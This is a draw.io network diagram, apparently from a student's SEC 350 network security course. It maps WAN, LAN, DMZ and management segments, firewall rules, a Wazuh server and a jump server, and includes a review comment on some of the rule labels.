</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-12" value="10.0.17.151&lt;div&gt;eth0&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-11">
<mxGeometry x="0.4517" y="1" relative="1" as="geometry">
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-13" value="esxi02-fw1" style="image;html=1;image=img/lib/clip_art/networking/Firewall_02_128x128.png" vertex="1" parent="1">
<mxGeometry x="466.01" y="170" width="80" height="80" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-14" value="&lt;div&gt;&lt;br&gt;&lt;/div&gt;" style="shape=umlActor;verticalLabelPosition=bottom;verticalAlign=top;html=1;outlineConnect=0;" vertex="1" parent="1">
<mxGeometry x="190" y="210" width="50" height="80" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-15" value="" style="endArrow=none;html=1;rounded=0;exitX=0;exitY=0.5;exitDx=0;exitDy=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-56" target="r5Bo3zyKJavz-clfbByA-14">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="460" y="390" as="sourcePoint" />
<mxPoint x="510" y="340" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-16" value="sec350.cyber.local&lt;div&gt;10.0.17.100&lt;/div&gt;" style="image;points=[];aspect=fixed;html=1;align=center;shadow=0;dashed=0;image=img/lib/allied_telesis/computer_and_terminals/Server_Desktop.svg;" vertex="1" parent="1">
<mxGeometry x="443.99" y="364" width="56.01" height="71" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-17" value="" style="endArrow=none;html=1;rounded=0;entryX=0;entryY=1;entryDx=0;entryDy=0;exitX=0.417;exitY=0.031;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-16" target="r5Bo3zyKJavz-clfbByA-13">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="620" y="470" as="sourcePoint" />
<mxPoint x="670" y="420" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-18" value="port forwarding" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];rotation=90;" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-17">
<mxGeometry x="-0.27" y="1" relative="1" as="geometry">
<mxPoint x="-7" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-19" value="" style="endArrow=none;html=1;rounded=0;exitX=0;exitY=0.5;exitDx=0;exitDy=0;entryX=1.006;entryY=0.471;entryDx=0;entryDy=0;entryPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-1" target="r5Bo3zyKJavz-clfbByA-16">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="570" y="440" as="sourcePoint" />
<mxPoint x="410" y="380" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-20" value="" style="endArrow=none;html=1;rounded=0;entryX=1;entryY=0.965;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.49;exitY=-0.035;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-1" target="r5Bo3zyKJavz-clfbByA-13">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="600" y="310" as="sourcePoint" />
<mxPoint x="650" y="260" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-21" value="10.0.17.2" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-20">
<mxGeometry x="0.7364" y="-1" relative="1" as="geometry">
<mxPoint x="8" y="8" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-23" value="MGMT 172.16.2000.0/28" style="rounded=1;whiteSpace=wrap;html=1;align=center;" vertex="1" parent="1">
<mxGeometry x="782" y="970" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-24" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;entryX=0.121;entryY=1.05;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.5;exitY=0;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-49" target="r5Bo3zyKJavz-clfbByA-2">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="846" y="800" as="sourcePoint" />
<mxPoint x="1034" y="830" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-25" value="&lt;div&gt;172.16.150.3&lt;/div&gt;eth0" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];fontSize=12;" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-24">
<mxGeometry x="-0.5172" y="-1" relative="1" as="geometry">
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-26" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;exitX=0.5;exitY=1;exitDx=0;exitDy=0;exitPerimeter=0;entryX=0.103;entryY=0.05;entryDx=0;entryDy=0;entryPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-49" target="r5Bo3zyKJavz-clfbByA-23">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="984" y="880" as="sourcePoint" />
<mxPoint x="1034" y="830" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-27" value="172.16.200.2&lt;div&gt;eth1&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];fontSize=12;" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-26">
<mxGeometry x="-0.2728" y="1" relative="1" as="geometry">
<mxPoint x="-1" y="8" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-28" value="wazuh&lt;div&gt;172.16.200.10&lt;/div&gt;" style="shape=image;html=1;verticalAlign=top;verticalLabelPosition=bottom;labelBackgroundColor=#ffffff;imageAspect=0;aspect=fixed;image=https://cdn1.iconfinder.com/data/icons/logos-brands-1/24/logo_brand_brands_logos_ubuntu-128.png" vertex="1" parent="1">
<mxGeometry x="782" y="1070" width="60" height="60" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-29" value="MGMT02&lt;div&gt;172.16.200.11&lt;/div&gt;" style="sketch=0;aspect=fixed;pointerEvents=1;shadow=0;dashed=0;html=1;strokeColor=none;labelPosition=center;verticalLabelPosition=bottom;verticalAlign=top;align=center;fillColor=#00188D;shape=mxgraph.mscae.enterprise.windows_server" vertex="1" parent="1">
<mxGeometry x="940" y="1070" width="39" height="50" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-30" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;entryX=0.5;entryY=1;entryDx=0;entryDy=0;exitX=0.308;exitY=0.12;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-29" target="r5Bo3zyKJavz-clfbByA-23">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="984" y="1000" as="sourcePoint" />
<mxPoint x="1034" y="950" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-31" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;entryX=0.107;entryY=1.038;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.5;exitY=0;exitDx=0;exitDy=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-28" target="r5Bo3zyKJavz-clfbByA-23">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="984" y="1000" as="sourcePoint" />
<mxPoint x="1034" y="950" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-32" value="&lt;div&gt;ANY &amp;gt; 172.16.50.3:80&lt;/div&gt;&lt;div&gt;172.16.150.10:22 &amp;gt; ANY:22&lt;/div&gt;" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;endSize=15.103448275862068;strokeWidth=1;sourcePerimeterSpacing=0;startSize=6;width=34.48275862068966;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="720" y="640" as="sourcePoint" />
<mxPoint x="540" y="640" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-33" value="ANY &gt; 172.16.200.10:1514,1515" style="shape=flexArrow;endArrow=classic;rounded=0;width=24.137931034482758;endSize=9.379310344827585;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="550" y="680" as="sourcePoint" />
<mxPoint x="740" y="680" as="targetPoint" />
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-34" value="ANY:80 &gt; 172.16.50.3:80" style="shape=flexArrow;endArrow=classic;rounded=0;endSize=11.33;strokeWidth=1;sourcePerimeterSpacing=0;startSize=6;width=28;horizontal=1;labelBackgroundColor=default;" edge="1" parent="1">
<mxGeometry x="-0.1119" y="-8" width="50" height="50" relative="1" as="geometry">
<mxPoint x="575" y="441.6" as="sourcePoint" />
<mxPoint x="489" y="561.6" as="targetPoint" />
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-35" value="&lt;div&gt;ANY &amp;gt; ANY&lt;/div&gt;&lt;div&gt;No restrictions&lt;br&gt;&lt;/div&gt;" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;endSize=15.019354838709678;strokeWidth=1;sourcePerimeterSpacing=0;startSize=6;width=20;" edge="1" parent="1">
<mxGeometry x="-0.2319" width="50" height="50" relative="1" as="geometry">
<mxPoint x="910" y="580" as="sourcePoint" />
<mxPoint x="883" y="450" as="targetPoint" />
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-36" value="FW01 default policy:&#xa;DROP with logging&#xa;Established connections allowed " style="rounded=0;whiteSpace=wrap;fontSize=10;verticalAlign=middle;" vertex="1" parent="1">
<mxGeometry x="700" y="480" width="151" height="70" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-37" value="" style="endArrow=none;html=1;rounded=0;entryX=0;entryY=0.5;entryDx=0;entryDy=0;exitX=1;exitY=0.5;exitDx=0;exitDy=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="730" y="490" as="sourcePoint" />
<mxPoint x="950" y="390" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-38" value="FW-MGMT default policy:&#xa;DROP with logging&#xa;Established connections allowed " style="rounded=0;whiteSpace=wrap;fontSize=10;verticalAlign=middle;" vertex="1" parent="1">
<mxGeometry x="631" y="790" width="151" height="70" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-39" value="" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;width=19.25925925925926;endSize=11.2;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="940" y="680" as="sourcePoint" />
<mxPoint x="950" y="846" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-40" value="&lt;div&gt;172.16.150.10:22 &amp;gt; 172.16.200.10:22&lt;br&gt;&lt;/div&gt;&lt;div&gt;172.16.150.10:443 &amp;gt; 172.16.200.10:443&lt;/div&gt;ANY &amp;gt; 172.16.200.10:1514,1515" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-39">
<mxGeometry x="-0.1287" y="2" relative="1" as="geometry">
<mxPoint x="24" y="-2" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-41" value="" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;width=13.793103448275863;endSize=7.63448275862069;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="920" y="950" as="sourcePoint" />
<mxPoint x="900" y="790" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-42" value="&lt;div&gt;ANY &amp;gt; 172.16.150.0/24&lt;/div&gt;&lt;div&gt;ANY &amp;gt; 172.16.50.0/29&lt;br&gt;&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-41">
<mxGeometry x="-0.0417" y="-7" relative="1" as="geometry">
<mxPoint x="23" y="18" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-43" value="&lt;div&gt;&lt;br&gt;&lt;/div&gt;" style="shape=umlActor;verticalLabelPosition=bottom;verticalAlign=top;html=1;outlineConnect=0;" vertex="1" parent="1">
<mxGeometry x="1115" y="200" width="50" height="80" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-44" value="" style="endArrow=none;html=1;rounded=0;exitX=0.612;exitY=-0.033;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-2" target="r5Bo3zyKJavz-clfbByA-50">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="970" y="590" as="sourcePoint" />
<mxPoint x="1020" y="540" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-45" value="" style="endArrow=none;html=1;rounded=0;exitX=0.882;exitY=-0.005;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-2" target="r5Bo3zyKJavz-clfbByA-51">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="1020" y="570" as="sourcePoint" />
<mxPoint x="1070" y="520" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-46" value="" style="endArrow=none;html=1;rounded=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-48" target="r5Bo3zyKJavz-clfbByA-43">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="1090" y="430" as="sourcePoint" />
<mxPoint x="1140" y="380" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-47" value="" style="endArrow=none;html=1;rounded=0;entryX=0.5;entryY=0;entryDx=0;entryDy=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-48" target="r5Bo3zyKJavz-clfbByA-51">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="1090" y="430" as="sourcePoint" />
<mxPoint x="1140" y="380" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-48" value="&lt;div&gt;Access via&lt;/div&gt;&lt;div&gt;Chrome Remote Desktop&lt;br&gt;&lt;/div&gt;" style="dashed=0;outlineConnect=0;html=1;align=center;labelPosition=center;verticalLabelPosition=bottom;verticalAlign=top;shape=mxgraph.weblogos.chrome;labelBackgroundColor=default;" vertex="1" parent="1">
<mxGeometry x="1110" y="364" width="60" height="60" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-49" value="&lt;span&gt;FW-MGMT&lt;/span&gt;" style="outlineConnect=0;dashed=0;verticalLabelPosition=bottom;verticalAlign=top;align=center;html=1;shape=mxgraph.aws3.router;fillColor=#F58534;gradientColor=none;labelBackgroundColor=#FFFFFF;" vertex="1" parent="1">
<mxGeometry x="782" y="753" width="69" height="72" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-50" value="wks01&lt;div&gt;172.16.150.50&lt;/div&gt;" style="image;sketch=0;aspect=fixed;html=1;points=[];align=center;fontSize=12;image=img/lib/mscae/VirtualMachineWindows.svg;" vertex="1" parent="1">
<mxGeometry x="980" y="515.6" width="50" height="46" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-51" value="mgmt01&lt;div&gt;172.16.150.10&lt;/div&gt;" style="shape=image;html=1;verticalAlign=top;verticalLabelPosition=bottom;labelBackgroundColor=#ffffff;imageAspect=0;aspect=fixed;image=https://cdn1.iconfinder.com/data/icons/operating-system-flat-1/30/ubuntu-128.png" vertex="1" parent="1">
<mxGeometry x="1080" y="502.6" width="70" height="70" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-52" value="&lt;div&gt;&lt;font style=&quot;font-size: 18px;&quot;&gt;SEC 350 -&amp;nbsp; Network Security Controls&lt;/font&gt;&lt;/div&gt;&lt;div&gt;&lt;font style=&quot;&quot;&gt;&lt;font style=&quot;font-size: 18px;&quot;&gt;Network Diagram - Charlotte Croce&lt;/font&gt;&lt;font style=&quot;font-size: 16px;&quot;&gt;&lt;br&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;&lt;div&gt;&lt;font style=&quot;&quot;&gt;&lt;font style=&quot;font-size: 18px;&quot;&gt;MIDTERM AND AFTER&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;" style="rounded=0;whiteSpace=wrap;html=1;" vertex="1" parent="1">
<mxGeometry x="654" y="130" width="356" height="100" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-53" value="" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://wazuh.com/uploads/2022/05/wazuh-logo.png;" vertex="1" parent="1">
<mxGeometry x="820.66" y="1040" width="89.68" height="30" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-56" value="access via vSphere" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://raw.githubusercontent.com/pulumiverse/pulumi-esxi-native/main/docs/esxi-logo.png;clipPath=inset(3% 4.33% 5% 2%);" vertex="1" parent="1">
<mxGeometry x="320" y="215.71" width="69.82" height="68.58" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-57" value="" style="endArrow=none;html=1;rounded=0;entryX=0;entryY=1;entryDx=0;entryDy=0;exitX=1;exitY=0.5;exitDx=0;exitDy=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-56" target="r5Bo3zyKJavz-clfbByA-13">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="490" y="330" as="sourcePoint" />
<mxPoint x="540" y="280" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-58" value="" style="endArrow=none;html=1;rounded=0;entryX=0.75;entryY=1;entryDx=0;entryDy=0;exitX=0.5;exitY=0;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-9" target="r5Bo3zyKJavz-clfbByA-3">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="470" y="700" as="sourcePoint" />
<mxPoint x="520" y="650" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-59" value="Text" style="text;strokeColor=none;align=center;fillColor=none;html=1;verticalAlign=middle;whiteSpace=wrap;rounded=0;" vertex="1" parent="1">
<mxGeometry x="570" y="500" width="60" height="30" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-62" value="" style="endArrow=classic;html=1;rounded=0;dashed=1;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="340" y="880" as="sourcePoint" />
<mxPoint x="770" y="1080" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-63" value="" style="endArrow=classic;html=1;rounded=0;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="640" y="490" as="sourcePoint" />
<mxPoint x="580" y="470" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-64" value="&lt;font style=&quot;font-size: 8px;&quot;&gt;PF :80&lt;/font&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-63">
<mxGeometry x="0.0469" y="3" relative="1" as="geometry">
<mxPoint x="2" y="-2" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-65" value="NGINX01" style="shape=image;html=1;verticalAlign=top;verticalLabelPosition=bottom;labelBackgroundColor=#ffffff;imageAspect=0;aspect=fixed;image=https://cdn1.iconfinder.com/data/icons/operating-system-flat-1/30/ubuntu-128.png;clipPath=inset(10.94% 10.94% 10.94% 10.94%);" vertex="1" parent="1">
<mxGeometry x="185" y="693" width="60" height="60" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-66" value="TRAVELER" style="image;sketch=0;aspect=fixed;html=1;points=[];align=center;fontSize=12;image=img/lib/mscae/VirtualMachineWindows.svg;" vertex="1" parent="1">
<mxGeometry x="950" y="360" width="50" height="46" as="geometry" />
</mxCell>
</root>
</mxGraphModel>
</diagram>
</mxfile>
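Review bot: the WAN-to-DMZ arrow label `ANY:80 > 172.16.50.3:80` (cell r5Bo3zyKJavz-clfbByA-34, drawn from the WAN area down toward the DMZ) reads as a source-port-80 restriction, which ordinary web clients on ephemeral source ports would never satisfy; the LAN-side arrow (cell r5Bo3zyKJavz-clfbByA-32) uses `ANY > 172.16.50.3:80`, and the WAN label should presumably match that form so the diagram documents the rule that is actually meant. Two leftovers should also be cleaned up before this diagram is treated as the documented rule set: the placeholder label `Text` (cell r5Bo3zyKJavz-clfbByA-59 at x=570, y=500) and the unlabeled dashed arrow running from the DMZ area to the Wazuh icon (cell r5Bo3zyKJavz-clfbByA-62), which carries no rule or port information unlike every other flow arrow on the page.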


@ -0,0 +1,306 @@
<mxfile host="app.diagrams.net" agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" version="26.1.1">
<diagram name="Page-1" id="vxOPZugNCJ2shPD0R46R">
<mxGraphModel dx="1750" dy="952" grid="1" gridSize="10" guides="1" tooltips="1" connect="1" arrows="1" fold="1" page="1" pageScale="1" pageWidth="550" pageHeight="1100" math="0" shadow="0">
<root>
<mxCell id="0" />
<mxCell id="1" parent="0" />
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-5" value="SEC-350 WAN 10.0.17.0/24" style="rounded=1;whiteSpace=wrap;html=1;align=center;" parent="1" vertex="1">
<mxGeometry x="560" y="380" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-7" value="LAN 172.16.150.0/24" style="rounded=1;whiteSpace=wrap;html=1;align=center;" parent="1" vertex="1">
<mxGeometry x="770" y="620" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-8" value="DMZ 172.16.50.0/29" style="rounded=1;whiteSpace=wrap;html=1;align=center;" parent="1" vertex="1">
<mxGeometry x="160" y="610" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-9" value="FW01" style="outlineConnect=0;dashed=0;verticalLabelPosition=bottom;verticalAlign=top;align=center;html=1;shape=mxgraph.aws3.router;fillColor=#F58534;gradientColor=none;" parent="1" vertex="1">
<mxGeometry x="610" y="502.6" width="69" height="72" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-10" value="" style="endArrow=none;html=1;rounded=0;entryX=0.855;entryY=0.855;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.104;exitY=0;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-7" target="WV4KZU-K2HEF4Ivt-XvY-9" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="921" y="710" as="sourcePoint" />
<mxPoint x="971" y="660" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-12" value="172.16.150.2&lt;div&gt;eth2&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];rotation=0;" parent="WV4KZU-K2HEF4Ivt-XvY-10" vertex="1" connectable="0">
<mxGeometry x="0.002" y="2" relative="1" as="geometry">
<mxPoint x="-6" y="-14" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-15" value="" style="endArrow=none;html=1;rounded=0;entryX=0.145;entryY=0.855;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.829;exitY=-0.05;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-8" target="WV4KZU-K2HEF4Ivt-XvY-9" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="491" y="560" as="sourcePoint" />
<mxPoint x="541" y="510" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-16" value="172.16.50.2&lt;div&gt;eth1&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];rotation=0;" parent="WV4KZU-K2HEF4Ivt-XvY-15" vertex="1" connectable="0">
<mxGeometry x="0.4" y="-1" relative="1" as="geometry">
<mxPoint x="-17" y="6" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-18" value="LOG01 (DECOMMISSIONED,&amp;nbsp;&lt;div&gt;THEN RECOMMISSIONED AS A&amp;nbsp;&lt;/div&gt;&lt;div&gt;JUMP SERVER)&lt;br&gt;&lt;div&gt;172.16.50.5&lt;/div&gt;&lt;/div&gt;" style="outlineConnect=0;dashed=0;verticalLabelPosition=bottom;verticalAlign=top;align=center;html=1;shape=mxgraph.aws3.traditional_server;fillColor=#7D7C7C;gradientColor=none;" parent="1" vertex="1">
<mxGeometry x="420" y="690" width="35.5" height="53" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-21" value="" style="endArrow=none;html=1;rounded=0;entryX=0.5;entryY=0;entryDx=0;entryDy=0;exitX=0.153;exitY=0.975;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-8" target="8yr2mNF9FMK26sW0gYA2-46" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="481" y="850" as="sourcePoint" />
<mxPoint x="213.25" y="690" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-23" value="" style="endArrow=none;html=1;rounded=0;entryX=0.5;entryY=0;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.432;exitY=1.047;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-5" target="WV4KZU-K2HEF4Ivt-XvY-9" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="805" y="530" as="sourcePoint" />
<mxPoint x="855" y="480" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="6gv1575Ye6TbEdJx1Vt9-2" value="10.0.17.151&lt;div&gt;eth0&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" parent="WV4KZU-K2HEF4Ivt-XvY-23" vertex="1" connectable="0">
<mxGeometry x="0.4517" y="1" relative="1" as="geometry">
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-25" value="esxi02-fw1" style="image;html=1;image=img/lib/clip_art/networking/Firewall_02_128x128.png" parent="1" vertex="1">
<mxGeometry x="466.01" y="170" width="80" height="80" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-26" value="&lt;div&gt;&lt;br&gt;&lt;/div&gt;" style="shape=umlActor;verticalLabelPosition=bottom;verticalAlign=top;html=1;outlineConnect=0;" parent="1" vertex="1">
<mxGeometry x="190" y="210" width="50" height="80" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-27" value="" style="endArrow=none;html=1;rounded=0;exitX=0;exitY=0.5;exitDx=0;exitDy=0;" parent="1" source="8yr2mNF9FMK26sW0gYA2-48" target="WV4KZU-K2HEF4Ivt-XvY-26" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="460" y="390" as="sourcePoint" />
<mxPoint x="510" y="340" as="targetPoint" />
</mxGeometry>
</mxCell>
